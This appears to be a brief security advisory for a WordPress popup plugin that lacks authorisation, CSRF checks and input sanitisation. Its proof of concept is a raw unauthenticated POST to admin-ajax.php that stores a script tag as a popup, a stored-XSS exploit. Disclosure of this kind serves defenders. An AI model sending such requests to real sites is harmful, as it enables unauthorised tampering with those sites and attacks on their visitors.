The plugin does not have authorisation and Cross-Site Request Forgery (CSRF) check when creating/updating popups, and is missing sanitisation as well as escaping, which could allow unauthenticated attackers to create arbitrary popups and add Stored Cross-Site Scripting (XSS) payloads as well.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=pm_save_data&form_action=update&form_id=1&form_name=vulnerability&form_data={"form_action":"undefined","popup_template":"text","popup_template_style":"","popup_location":"modal-popup","popup_timer":"0","popup_trigger":"timer","popup_entry_animation":"bounce","popup_exit_animation":"bounce","popup_title":"XSS","popup_disclaimer":"Try XSS","popup_text":"vulnerable"}&popup_html=<script>alert("XSS");</script>